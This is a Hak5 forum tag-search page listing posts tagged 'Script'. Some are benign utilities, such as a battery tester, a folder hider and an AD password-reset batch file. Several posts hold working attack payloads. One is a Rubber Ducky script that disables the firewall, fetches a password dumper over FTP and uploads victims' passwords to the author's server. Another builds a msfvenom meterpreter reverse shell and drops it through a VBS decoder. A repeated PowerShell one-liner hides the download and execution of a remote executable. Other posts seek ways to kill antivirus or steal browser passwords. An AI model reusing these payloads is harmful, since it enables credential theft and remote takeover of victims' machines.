Jump to content

Search the Community

Showing results for tags 'Script'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. Hi, after the latest update of ChromeOS on our CB:s i cant get arount "google terms of service". Earlier (OS 84 and earlier) it was only tab and enter. Is it posible to use PAUSE and wait for user to interact, or do someone have a solution on my problems? Model of CB: HP Chromebook 14 G6 and ChromeOS version 85.0.4183.84 witch i use a USB to update before install with Rubber Ducky
  2. Hey guys and gals. I need to crack a password for a very very old piece of software (its over 20 years old at this stage and the dev is no longer supporting it). Pretty sure it was developed in Windows 98. The software gets activated with a 6 digit number. The apps way around brute force is to shut down the app after every failed attempt. This is the code i need to loop... 1 million times (with the second string increasing by 1 digit every time) 😂. GUI r DELAY 100 STRING C:\app\software\app.exe ENTER DELAY 1000 STRING 000001 ENTER ENTER What's would be the fastest way for me to write in the increasing 6 digit number (6th line of the code) into a script? Currently i have an excel file open with column A populated with increasing numbers (cell A1=000000, A2=000001 etc). I can write the script to copy from the excel list after every attempt but would there be a more efficient way to code the numbers directly into the ducky script to increase the speed of the brute force. Short of that could you advise of some brute force software on windows that can follow the above script's flow since the app shuts down after every failed attempt and needs to be re-launched again.
  3. Battery Tester/CPU Stress For the SharkJack I keep seeing people talk about how the battery lasts less then 10 minutes, etc etc etc.. I made a script to test and prove the Battery Drains incredibly fast under load. Further more... The Script.. (NOTE: This Script should be ran on the SharkJack itself!) battery-tester.sh #!/bin/bash # Title : Battery Tester/CPU Stress # Author : REDD of Private-Locker # Version : 1.1 # Description : The script uses a simple log system to pull the # batteries status, date, and time into a log file for Hak5 # to help diagnose the issues. Also uses "sha256sum" to verify # a null file leaving it to stress the CPU. # # Log File : /root/battery.log # Set to YES to stress the CPU during Battery Test. MAX_LOAD=YES STRESS="sha256sum" # Time in seconds to report in log. (20 mins = 1200) TIME=600 # Initial Script Variables - DO NOT CHANGE UNDER_LOAD=0 DATE_NOW=$(date +'%r') START_TIME=$(date) CPU_USAGE=$(grep 'cpu ' /proc/stat | awk '{usage=($2+$4)*100/($2+$4+$5)} END {print usage "%"}') BATTERY_STATUS=$(BATTERY) LOG_FILE="/root/battery.log" function DISPLAY_TIME () { MINS=$((TIME / 60)) SECS=$((TIME % 60)) if [ "$TIME" -ge "60" ]; then printf "$MINS minutes and $SECS seconds" else printf "$SECS seconds" fi } TOTAL_TIME=$(DISPLAY_TIME "$TIME") if [ ! -f "$LOG_FILE" ]; then touch "$LOG_FILE" fi if [ -f "$LOG_FILE" ]; then echo -e "" >> "$LOG_FILE" echo -e " Battery Test Date: $START_TIME" >> "$LOG_FILE" echo -e "==================================================" >> "$LOG_FILE" echo -e "" >> "$LOG_FILE" echo -e "" echo -e " Battery Test Date: $START_TIME" echo -e "\n Battery Test running for $TOTAL_TIME." echo -e " Battery Test running for $TOTAL_TIME." >> "$LOG_FILE" echo -e " Battery Status: $BATTERY_STATUS" echo -e " Battery Status: $BATTERY_STATUS" >> "$LOG_FILE" echo -e "" if [ "$MAX_LOAD" == "YES" ]; then echo -e "\n\n -> LOAD created by $STRESS." echo -e " -> LOAD created by $STRESS." >> "$LOG_FILE" echo -e "" >> "$LOG_FILE" echo -e "==================================================" >> "$LOG_FILE" echo -e "" >> "$LOG_FILE" fi echo -e "" >> "$LOG_FILE" fi echo -e "[${DATE_NOW}] -> LOAD: $MAX_LOAD - CPU Load: ${CPU_USAGE} [Battery Status: ${BATTERY_STATUS}]" >> "$LOG_FILE" for ((i=0; i<=TIME; i++)); do if [ "$MAX_LOAD" == "YES" ]; then if [ "$UNDER_LOAD" == "0" ]; then UNDER_LOAD=1 $STRESS /dev/zero & fi fi DATE_NOW=$(date +'%r') CPU_USAGE=$(grep 'cpu ' /proc/stat | awk '{usage=($2+$4)*100/($2+$4+$5)} END {print usage "%"}') BATTERY_STATUS=$(BATTERY) printf "[%s%s] -> LOAD: %s - CPU Load: %s [Battery Status: %s]\r" $DATE_NOW $MAX_LOAD $CPU_USAGE $BATTERY_STATUS echo -e "[${DATE_NOW}] -> LOAD: $MAX_LOAD - CPU Load: ${CPU_USAGE} [Battery Status: ${BATTERY_STATUS}]" >> "$LOG_FILE" sleep 1; done if [ "$UNDER_LOAD" == "1" ]; then killall -9 $STRESS fi echo -e "" >> "$LOG_FILE" echo -e "==================================================" >> "$LOG_FILE" echo -e "" >> "$LOG_FILE" # Blank line for running in Terminal. printf " \n" printf "Finished.\n" Output Example: Battery Test Date: Tue Jan 28 13:47:30 UTC 2020 ================================================== Battery Test running for 10 seconds. Battery Status: full [01:47:30 PM] -> LOAD: NO - CPU Load: 18.0325% [Battery Status: full] [01:47:30 PM] -> LOAD: NO - CPU Load: 18.0437% [Battery Status: full] [01:47:31 PM] -> LOAD: NO - CPU Load: 18.0428% [Battery Status: full] [01:47:32 PM] -> LOAD: NO - CPU Load: 18.0432% [Battery Status: full] [01:47:33 PM] -> LOAD: NO - CPU Load: 18.0469% [Battery Status: full] [01:47:34 PM] -> LOAD: NO - CPU Load: 18.0515% [Battery Status: full] [01:47:35 PM] -> LOAD: NO - CPU Load: 18.0556% [Battery Status: full] [01:47:37 PM] -> LOAD: NO - CPU Load: 18.0596% [Battery Status: full] [01:47:38 PM] -> LOAD: NO - CPU Load: 18.0641% [Battery Status: full] [01:47:39 PM] -> LOAD: NO - CPU Load: 18.0678% [Battery Status: full] [01:47:40 PM] -> LOAD: NO - CPU Load: 18.0718% [Battery Status: full] [01:47:41 PM] -> LOAD: NO - CPU Load: 18.0759% [Battery Status: full] ================================================== I really hope this helps everyone else in their troubles in finding out if their Battery is just defective or it's just "Under Load" that makes it so short.
  4. I've had two BashBunny payloads fail on me (USB_File_Exfiltration and SmartFileExtract_Exfiltration) when I ran them in the morning, after working on them for a full day trying to get them to work (the night before). Debugging the scripts on Windows, I found out that the date/time stamp formatting for the filename was causing the issue. The hour is left-padded with a space in the AM. I found the following hint for creating Windows Batch Script variables that are properly formatted with the date/time. My modified code to match the format in the payload scripts is below: @echo off for /f "tokens=2 delims==" %%a in ('wmic OS Get localdatetime /value') do set "dt=%%a" set "YY=%dt:~2,2%" & set "YYYY=%dt:~0,4%" & set "MM=%dt:~4,2%" & set "DD=%dt:~6,2%" set "HH=%dt:~8,2%" & set "Min=%dt:~10,2%" & set "Sec=%dt:~12,2%" set "datestamp=%YYYY%%MM%%DD%" & set "timestamp=%HH%%Min%%Sec%" & set "fullstamp=%YYYY%%MM%%DD%_%HH%%Min%%Sec%" echo datestamp: "%datestamp%" echo timestamp: "%timestamp%" echo fullstamp: "%fullstamp%" pause Here is the output: datestamp: "20190809" timestamp: "084546" fullstamp: "20190809_084546" Press any key to continue . . . And here is the link that helped me figure it out: How do I get current datetime on the Windows command line, in a suitable format for using in a filename? I hope this helps someone avoid the struggle I've been having the last two days.
  5. Can you make videos on automation in non-rooted android smartphone remotely?? We know, we can write a bash/shell script and send it to someone remotely via link, if he/she clicks on link, the script will automatically execute. Can we do same in non-rooted android smartphone too?? For an instance, can we send a link to someone with a non-rooted android smartphone , if he/she clicks on link, automatically his/her email account will open, automatically a message will be written in email and it will be sent automatically. Is it possible?? I think it is same as rubber ducky
  6. Hey guys, my name is Patrick. Im new in the hacking world, im learning. I have a question, I'm trying to download and execute a payload in my rubber ducky but I can't. This is the script: DELAY 2000 GUI r DELAY 1000 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://myserver/file.exe','C:\file.exe');&'C:\file.exe' ENTER Can someone help me please.
  7. Hey guys, my name is Patrick. Im new in the hacking world, im learning. I have a question, I'm trying to download and execute a payload in my rubber ducky but I can't. This is the script: DELAY 2000 GUI r DELAY 1000 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://myserver/file.exe','C:\file.exe');&'C:\file.exe' ENTER Can someone help me please.
  8. Hey there Hak5 community and fellow Rubber Ducky users! I'm a MacOS user and a beginner when it comes to coding, but I came up with a little bash script to help speed up the encoding process. It's nothing fancy. When I was writing a payload and having to encode then replace the file on the microSD and all that - it was getting a bit tedious. I call it duck_it. It basically takes your scripts as .txt files, encodes them, and transfers them to your microSD card and ejects the card. https://github.com/dot-iso/duck_it I'm new to Bash and GitHub, so there may be some n00b stuff. I'm sure there's a lot of room for improvement
  9. Hoi! So, I've decided to post a script that I've been using for many years. What it does is lock a folder with a specified password, allowing you to hide and unhide a folder from view any time you please. Keep in mind the code isn't entirely mine - it's an upgraded version of script I found on the internet many years ago. The method of hiding the folder can be seen through if the intruder suspects that there is something hidden there. If a hacker or pentester suspected that there was a hidden file they could find it fairly easily, and I'll tell you how later on in this post. However, if anyone else approached your computer and looked at the files they probably wouldn't look twice. I mean, would you? I don't, unless I suspect.. So, here's the code (why can't we have spoiler tags..): @echo off color 0a :LOAD cls if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto MAIN if NOT EXIST MyStuff goto MFOLDER goto MAIN :MAIN cls echo [ FolderLocker V3 ] echo. echo 1 - LOCK FOLDER echo 2 - UNLOCK FOLDER echo 3 - EXIT echo. set /p Choice=Choice: if %Choice% == 1 goto CONFIRMLOCK if %Choice% == 2 goto UNLOCK if %Choice% == 3 goto EXIT goto MAIN :LOCK ren "MyStuff" "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" echo Folder 'MyStuff' has been locked. timeout /t 1 >NUL goto MAIN :CONFIRMLOCK cls echo [ FolderLocker V3 ] echo. echo Lock Folder 'MyStuff'? (Y/N) set /p Choice=Choice: if %Choice% == Y goto LOCK if %Choice% == y goto LOCK if %Choice% == N goto MAIN if %Choice% == n goto MAIN echo Invalid choice. timeout /t 1 >NUL goto MAIN :UNLOCK cls echo [ FolderLocker V3 ] echo. echo Folder's Password: set /p Password=Password: if NOT %Password% == password goto EXIT ELSE attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" "MyStuff" echo Folder 'MyStuff' has been unlocked. timeout /t 1 >NUL goto MAIN :MFOLDER cls echo [ FolderLocker V3 ] echo. md MyStuff echo Folder 'MyStuff' has been created. timeout /t 1 >NUL goto MAIN :EXIT To change the password, just put your password in the :UNLOCK function, 6th line down from the line ":UNLOCK". You can also configure the commands so that it can unlock/lock a file in another directory, making it harder for a random person to know where the folder is, and greatly reduces the chances of someone suspecting a hidden folder (come on, a batch/exe file sitting there saying "FolderLockerV3" isn't going to spark some suspicion?). The folder to be locked is called 'MyStuff', to those who can't understand batch overly well. Anyway, as you may have deducted, the method of hiding the file is very simple. It adds the hidden tag on the file (obviously), but then makes Windows think it's a protected OS file (specifically, a Control Panel file). To view the file when it's hidden, you can click on the 'Options' button under 'View' in Windows Explorer and then click on 'Change folder and search options', then go to the 'View' tab, click on 'Show hidden files, folders and drives', scroll down a little more and then untick 'Hide protected operating system files'. Click on 'Apply' and 'Ok', then you should see the Control Panel folder with all it's contents. So you can see it's not overly secure but it's not obvious to those who don't know how it's secured. Now that I've told you it seems easy, right? If you didn't know you might be hard pressed to find out, assuming the owner of the folder converted the batch into an executable or something else that hides plain text. Anyway, enjoy and let me know if you have any other improvements or changes you want to (or are even going to) make to this code! I would love to know your ideas.
  10. Hey All, I am trying to create a bin file with some nircmd commands and I keep getting errors on it. Can anyone advise me on how I am being an idiot. Thanks NW
  11. Hi all, I am creating some shell scripts that occasionally need to use an external Alfa WiFi card, but not all of the time. Rather than leaving the Alfa card enabled constantly, I would like the script to bring the card online when it is required, and switch it back off when it is not. I have read various methods to do this online, but none seem definitive, so I would like to ask which method I should use. So far, I have seen suggestions of; Using WLAN# up and WLAN# down Disabling USB ports using Hub-CTRL Using hardware add-ons This or this (unknown what is being done here) Even people saying it's not possible. What would you suggest? Has anyone else had any luck with switching off and back on an Alfa Wifi Card from a Linux command line/script? I haven't yet played around, as I'm not at home, but I don't want to waste my time trying a method that won't work as well as something else. Thank you.
  12. Hello everyone. I've flashed my Ducky to a Twin Ducky, hence I put on software (portable) with Command-Line Options. My goal is to successfully plug it into a Stand-Bye computer and actually make it work, make it execute. But the huge problem is the Anti-Virus. (Norton Small Business Edition). This AV keeps removing all the files and is really a pain in the ass. I was wondering if there was a way to once plugged in, let the Ducky (Temporary) Kill the Anti-Virus. Just so it doesn't have an scanning on, so it will not detect the file, and once everything is back up me and the Ducky will be gone. I have the Advantage because one, it's Windows 7 and the accounts that are being logged onto are Administrator-Privileged, so Pressing Yes or No with the Ducky will not be a problem. I really need help. 1. Plug in the Ducky 2. Payloads Activate; Kill's Anti-Virus (Short While just so files can get through) 3. Run the file (Command-Line) Be Out. I just need to learn how to Kill the AV. For Norton Small Business Edition it's pretty complex to just disable it straight from the Control Panel. Thanks, so much. -Mathew
  13. Hi all, I'm a newbie to Hak5 Forums, so if this thread is in the wrong category, it would be great if the admins could move it to the correct category. Most of you are probably using 'BO' as the region for 'iw' on Linux. This allows the WiFi interface to operate at 30dBm (1 Watt) at max. However, if you're like me and have a device that is capable of transmitting over 1W (I have Alpha Network AWUS036NH - 2W), you might be interested in increasing the TX power beyond 30dBm. By default, selecting 'BO' as the region only allows the device to operate at a maximum of 30dBm. I tested this on my Raspberry Pi 3, Model B running Kali Linux (with the kali-linux-full metapackage). *** If you are lazy and don't want to follow these manual steps below, I made two bash scripts that will work on Kali Linux and Ubuntu : https://github.com/hiruna/wifi-txpower-unlocker Working directory: /root Steps: 1. Update and upgrade apt-get update apt-get upgrade 2. Install dependencies to compile apt-get install pkg-config libnl-3-dev libgcrypt11-dev libnl-genl-3-dev build-essential 3. Download the latest Central Regulatory Domain Agent (CRDA) and Wireless Regulatory Database I downloaded crda-3.18.tar.xz and wireless-regdb-2017.03.07.tar.xz wget https://www.kernel.org/pub/software/network/crda/crda-3.18.tar.xz wget https://www.kernel.org/pub/software/network/wireless-regdb/wireless-regdb-2017.03.07.tar.xz 4. Unzip the downloaded files tar xvJf crda-3.18.tar.xz tar xvJf wireless-regdb-2017.03.07.tar.xz 5. Navigate into wireless-regdb-2017.03.07 cd wireless-regdb-2017.03.07 6. Open db.txt and locate the region BO section nano db.txt You will see something like this: country BO: DFS-JP (2402 - 2482 @ 40), (30) (5250 - 5330 @ 80), (30), DFS (5735 - 5835 @ 80), (30) The number in the second set of brackets (for each frequency) is the txpower. Since I'm using the 2.4Ghz and want a txpower of 2W (~33dBm), I changed the 20 to 33, and saved the file: country BO: DFS-JP (2402 - 2482 @ 40), (33) (5250 - 5330 @ 80), (30), DFS (5735 - 5835 @ 80), (30) I also noticed that region AU allows 36dBm for 2.4Ghz, so you could just continue without modifying the region BO: country AU: DFS-ETSI (2400 - 2483.5 @ 40), (36) (5150 - 5250 @ 80), (23), NO-OUTDOOR, AUTO-BW (5250 - 5350 @ 80), (20), NO-OUTDOOR, AUTO-BW, DFS (5470 - 5600 @ 80), (27), DFS (5650 - 5730 @ 80), (27), DFS (5730 - 5850 @ 80), (36) (57000 - 66000 @ 2160), (43), NO-OUTDOOR However, I checked with Kali Linux (without compiling and changing the regulatory.bin) and it showed that max txpower was only 20dBm: country AU: DFS-ETSI (2402 - 2482 @ 40), (N/A, 20), (N/A) (5170 - 5250 @ 80), (N/A, 17), (N/A), AUTO-BW (5250 - 5330 @ 80), (N/A, 24), (0 ms), DFS, AUTO-BW (5490 - 5710 @ 160), (N/A, 24), (0 ms), DFS (5735 - 5835 @ 80), (N/A, 30), (N/A) So I'm assuming Kali Linux is using an old regulatory.bin and legislation in AU has changed. 7. Compile make 8. Backup up your old regulatory.bin file and move the new file into /lib/crda mv /lib/crda/regulatory.bin /lib/crda/regulatory.bin.old mv regulatory.bin /lib/crda As mentioned in https://wireless.wiki.kernel.org/en/developers/regulatory/crda and https://wireless.wiki.kernel.org/en/developers/regulatory/wireless-regdb, we need to include RSA public keys in crda-3.18/pubkeys. I noticed that there are already 2 .pem files in crda-3.18/pubkeys: sforshee.key.pub.pem linville.key.pub.pem 9. Copy root.key.pub.pem into crda-3.18/pubkeys. I also copied sforshee.key.pub.pem from wireless-regdb-2017.03.07 as it was newer: cp root.key.pub.pem ../crda-3.18/pubkeys/ cp sforshee.key.pub.pem ../crda-3.18/pubkeys/ I found that there are two other pubkeys located at /lib/crda : -rw-r--r-- 1 root root 451 Jan 18 12:58 benh@debian.org.key.pub.pem -rw-r--r-- 1 root root 451 Jan 18 12:58 linville.key.pub.pem -rw-r--r-- 1 root root 451 Jan 18 12:58 sforshee.key.pub.pem So I copied them too (wasn't too sure whether I needed to copy them): cp /lib/crda/pubkeys/benh\@debian.org.key.pub.pem ../crda-3.18/pubkeys/ cp /lib/crda/pubkeys/linville.key.pub.pem ../crda-3.18/pubkeys/ 10. Navigate into crda-3.18 and open the Makefile cd ../crda-3.18 nano Makefile In Kali Linux, crda is located at /lib/crda instead of /usr/bin/crda, so in the file change the 3rd line REG_BIN?=/usr/lib/crda/regulatory.bin to REG_BIN?=/lib/crda/regulatory.bin : REG_BIN?=/lib/crda/regulatory.bin 11. In the Makefile, find the line CFLAGS += -std=gnu99 -Wall -Werror -pedantic and remove the -Werror option (I couldn't compile without changing it as it treats warnings as errors): CFLAGS += -std=gnu99 -Wall -pedantic 12. Compile make clean make make install That's it! I rebooted my Raspberry Pi after compiling. reboot 13. Now let's change the region and set the txpower to 33dBm: ifconfig wlan1 down iw reg set BO iwconfig wlan1 txpower 33 ifconfig wlan1 up
  14. At first: I´m sorry for my bad English, I´m only 14 and german ^^ So I just wrote this Rubber Ducky Script that downloads a .exe and a .bat from my FTP Server. Then it executes the .exe with the .bat file what creates a .txt file with all the passwords of the victim (of course me when I forgot my passwords :P). Then it deletes the .exe and .bat and uploads the .txt back to my server (it gets deleted after that, too.). Here´s the script: DELAY 1000 REM REM start cmd REM REM GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 STRING Alt j DELAY 1000 REM REM REM disable firewall REM REM STRING netsh advfirewall set currentprofile state off ENTER DELAY 500 REM color unreadable REM STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM REM REM download FTP REM STRING ftp myftpserver.com ENTER DELAY 1000 STRING username ENTER DELAY 1000 STRING password ENTER DELAY 500 STRING lcd C:\ ENTER DELAY 100 STRING binary ENTER DELAY 100 STRING GET i.exe ENTER DELAY 8000 STRING lcd C:\ ENTER DELAY 100 STRING binary ENTER DELAY 100 STRING GET r.bat ENTER DELAY 800 STRING by ENTER DELAY 500 REM REM REM PASSWORD STEAL REM REM REM STRING cd C:\ ENTER DELAY 500 STRING r.bat ENTER DELAY 10000 STRING del r.bat ENTER DELAY 500 STRING del i.exe ENTER REM REM REM REM UPLOAD REM REM REM REM DELAY 500 STRING ftp myftpserver.com ENTER DELAY 1000 STRING username ENTER DELAY 1000 STRING password ENTER DELAY 1000 STRING lcd c:\ ENTER DELAY 100 STRING ascii ENTER DELAY 100 DELAY 800 STRING put p.txt ENTER DELAY 500 STRING bye ENTER DELAY 300 STRING del c:\p.txt ENTER DELAY 200 STRING netsh advfirewall set currentprofile state on ENTER I´m right now working on decreasing the delays, but the download and upload delays are hard to time because it obviously depends on the internet speed the victim has. My ideas to improve this script: Leave the first FTP windows open so I don´t need to log in again(Cons: 1.I could get thrown out of the session after some time 2. I probably wouldn´t be able to switch with ALT + TAB because I don´t what other windows the victims has open) My question: Does this leave something like a log file? So that the victim could trace me back? If so, where would it be located? Do you guys have some suggestions? I would love to hear them :D Disclaimer: I can´t put the .exe on my Rubber Ducky using the Twin Duck method because I am using the MalDuino from Seytonic (basically cheap RubberDucky) which cannot be used as a Twin Duck. Thanks for your answers, contrix_ Edit: This is the batchfile: i /stext p.txt Disclaimer 2: Everything works fine without any problems.
  15. Hey all, I'm interested in compiling Ducky Script to c++ that will run on an arduino. I would like to take ducky scripts such as the Wallpaper prank, and be able to easily put it on an arduino without having to modify any code myself. Why use an arduino? I have a lot of them, and I would like to take advantage of them. While I did manually write the code for the wallpaper prank in c++ last night, I would like the process to be streamlined by a compiler. I've done some research already and have tried out a few compilers that people have made, such as the Duckuino compiler, but the ones I've found are buggy and throw errors when the arduino IDE is compiling the c++ produced by the Ducky Script compiler. My question is, does anyone know of a working compiler that will take Ducky Script and push it to valid arduino code; or should I just fix the bugs in the Duckuino repo? Let me know if you need more info, or if I'm unclear anywhere. Thanks!
  16. Hey, I ordered the beautiful USB rubber ducky and its working flawlessly. On windows its easy as copy-pasterino seeing how ducktoolkit is crazy good. I have one wish tho, and seeing how thats possible on windows, i dont see why it should be possible on mac. I want to be able to find a passord on a mac computer, on safari, chrome or firefox, does not matter. The password I am looking for is to a website. Also a quick question, I installed dropbox and my computer automatically logs in to the dropbox program, which is great. Just wondering where that password is saved..? Gonna be trying that on this device, and if it does not work ill try my look on the wifi pineapple nano, just got it today. :D Thank you guys!
  17. Hi guys I I just bought you is be rubber ducky and I have a Arabic computer and I can't run any kind off script I was questioning if there was a script to change the language of the device using ALT button and shift button to switch to English and run the script sorry for my bad English
  18. Hello. I am getting the following error when running the reverse shell script: c:\decoder.vbs(2, 179) Microsoft VBScript compilation error: Expected integer constant I tried it on Windows 7 and 10 with the same result. Here is the script I am using: And here is the screen output: Any help would be much appreciated! Thanks in advance.
  19. Salutations Hak5, I'm S0AndS0 a long time watcher (and big fan) of the various shows that have been made available by the Hak5 teem. What is shared here maybe thought of as a "tricky treat" for the holiday. https://github.com/S0AndS0/Perinoid_Pipes The above project has been documented in detail (because we've heard that the show hosts of Hak5 like that out of project authors) and as of latest local & remote tests is operating as expected. Simply put this project facilitates common encryption & decryption options of GnuPG via a named pipe (similar to anonymous pipes `|` but addressable via file path) and a customized listening loop that parses incoming data. Think of it as a *short-cut* for operations involving public key crypto; for example of normal encryption echo "some secret" | gpg -a -e user@email.host >> out.file And for comparison an example of encrypting via named pipe file echo "some secret" > /var/log/named.pipe This allows any service to utilize encryption by way of output redirection; logging daemons, web host logging, and/or your own custom services. So far three usage scenarios have been written but we're hoping that with this communities' help we can write at least two more together; perhaps a guide on using this tool with Rubber Ducky to automatically encrypt data off a target to either a second storage device or to the Ducky it's self. Notes for beginners; If you (the reader) are new or unfamiliar with encryption via GnuPG then ya may want to start with the documents in above code repo that begin with `Gnupg_` after coming to terms with the options available then check the script's help documentation via the following commands chmod u+x Paranoid_Pipes ./Paranoid_Pipes --help Use the output from above to modify your next commands, add `--help` at the end to check your settings prior to committing to them. Easy as pie. Notes for Moderators; If this has been posted in the wrong section please move or notify the OP's author to move it to the proper section. This tool has been shared with the this community in the hopes that readers will find it useful but without warranties of any kind. Notes for Show Hosts; If you wish to include this tool within a publication then you have permission, prematurely given, to utilize any of the tools found in the above code repository for either your own projects or for featuring the main project itself.
  20. I saw the rubber ducky and was VERY interested by it. I do not get how it fully works and would like to ask for a link or basic knowledge of it. I want to buy it ,but I am wondering if I did if I could get it to work. Or if it even is what I think it is. What I simply want from it is to place it into a computer and get google passwords. If anyone can help me with this it would be greatly appreciated.Don't hate on me. I know I am new to this and I'm reading over it and finding it very cringy as well.Thank You
  21. So I have seen people having issues with doing a download of a meterpreter payload and getting it to run from the ducky. I went for a different approach. I decided to try to modify this script from the wiki (i think darren did a segment on it) in a different way. Here is what I came up with. Create the exe from msfvenom with the parms to connect the the metasploit handler Encode the exe with base64 Edit the encoding to be duckyfied Append the duckyfied encoded exe to met.txt Append last.txt to met.txt Duckyencoder to make the inject.bin Place on ducky sdcard ... win msfvenom -a x86 --platform windows \ -p windows/meterpreter/reverse_tcp \ LHOST=IP_ADDRESS \ LPORT=PORT \ PREPENDMIGRATE=true \ PREPENDMIGRATEPROC=notepad.exe \ ReverseConnectRetries=20 \ -b '\x00' \ -e x86/shikata_ga_nai \ -f exe |\ base64 > bad_exe.txt sed -e 's/^/STRING /' -e '/STRING/ a ENTER' bad_exe.txt >> met.txt cat last.txt >> met.txt java -jar encoder.jar -i met.txt -o inject.bin Contents of met.txt ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 600 LEFTARROW ENTER DELAY 400 STRING copy con c:\decoder.vbs ENTER STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0) STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = STRING CreateObject("Scripting.FileSystemObject"): ENTER STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function STRING decodeBase64(base64): ENTER STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"): STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub STRING writeBytes(file, bytes):Dim binaryStream: ENTER STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1: STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub ENTER CTRL z ENTER STRING copy con c:\bad_exe.txt ENTER Contents of last.txt CTRL z ENTER STRING cscript c:\decoder.vbs c:\bad_exe.txt c:\bad.exe ENTER STRING c:\bad.exe ENTER STRING exit ENTER
  22. Quick question. Why does this not save when var fileLoc is set to a network location, but works fine when I put C:\somewhere? <html> <head> <script language="javascript"> function WriteToFile(passForm) { var fso = new ActiveXObject("Scripting.FileSystemObject"); var fileLoc = "\\SERVERNAME\Folder 1\Folder 2\data.csv"; var file = fso.CreateTextFile(fileLoc, true); file.writeline(passForm.FirstName.value + ',' + passForm.LastName.value); file.Close(); alert('File created successfully at location: ' + fileLoc); } </script> </head> <body> <p>create a csv file with following details -</p> <form> Type your first name: <input type="text" name="FirstName" size="20"> Type your last name: <input type="text" name="LastName" size="20"> <input type="button" value="submit" onclick="WriteToFile(this.form)"> </form> </body> </html> Initial question resolved. Please read below thread for further question/issue. Thanks.
  23. Hi all, Here's a nice script, entirely in a batch file, that ; Prompts for input of a user's Full Name and Email Address Sets their password to a random string of uppercase, lowercase and numerical characters. Generates an email to send to them, with their new password. Notes; Length of the password can be set using the line Set _RNDLength= Whether user has to reset their password on logging in can be set with -mustchpwd Amend OU= and DC= for your own companie's domain. @echo off :Start endlocal echo. echo This script will reset the password for a user, using their Full Name, echo and then generate the email to be sent to them. echo. echo Passwords are automatically set as 10 digits, using lowercase, echo uppercase and numbers. echo. echo. echo. set /p "DisplayName= Full Name : %=%" echo. echo. set /p "EmailAddress= Email : %=%" cls Setlocal EnableDelayedExpansion Set _RNDLength=10 Set _Alphanumeric=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 Set _Str=%_Alphanumeric%987654321 :_LenLoop IF NOT "%_Str:~18%"=="" SET _Str=%_Str:~9%& SET /A _Len+=9& GOTO :_LenLoop SET _tmp=%_Str:~9,1% SET /A _Len=_Len+_tmp SET _count=0 SET _RndAlphaNum= :_loop SET /a _count+=1 SET _RND=%Random% SET /A _RND=_RND%%%_Len% SET _RndAlphaNum=!_RndAlphaNum!!_Alphanumeric:~%_RND%,1! If !_count! lss %_RNDLength% goto _loop dsmod user "CN=%DisplayName%,OU=[OU],DC=[DC],DC=co,DC=uk" -pwd !_RndAlphaNum! -mustchpwd no IF ERRORLEVEL 0 ( GOTO SendEmail ) ELSE ( echo. echo Failed. echo. Pause GOTO Start ) :SendEmail start "" "mailto:%EmailAddress%?subject=Password%%20Reset&body=Hello,%%0D%%0A%%0D%%0AYour%%20AD%%20password%%20has%%20been%%20reset%%20to%%20!_RndAlphaNum!%%0D%%0A%%0D%%0AKind Regards,%%0D%%0A%%0D%%0AYour%%20Name" cls GOTO Start Email generated looks like this; Hello, Your AD password has been reset to kD5Xjfd8A6 Kind Regards, Your Name This saves me some time at work when we get loads of emails asking for password resets for AD accounts. Takes 30 seconds instead of a few minutes.
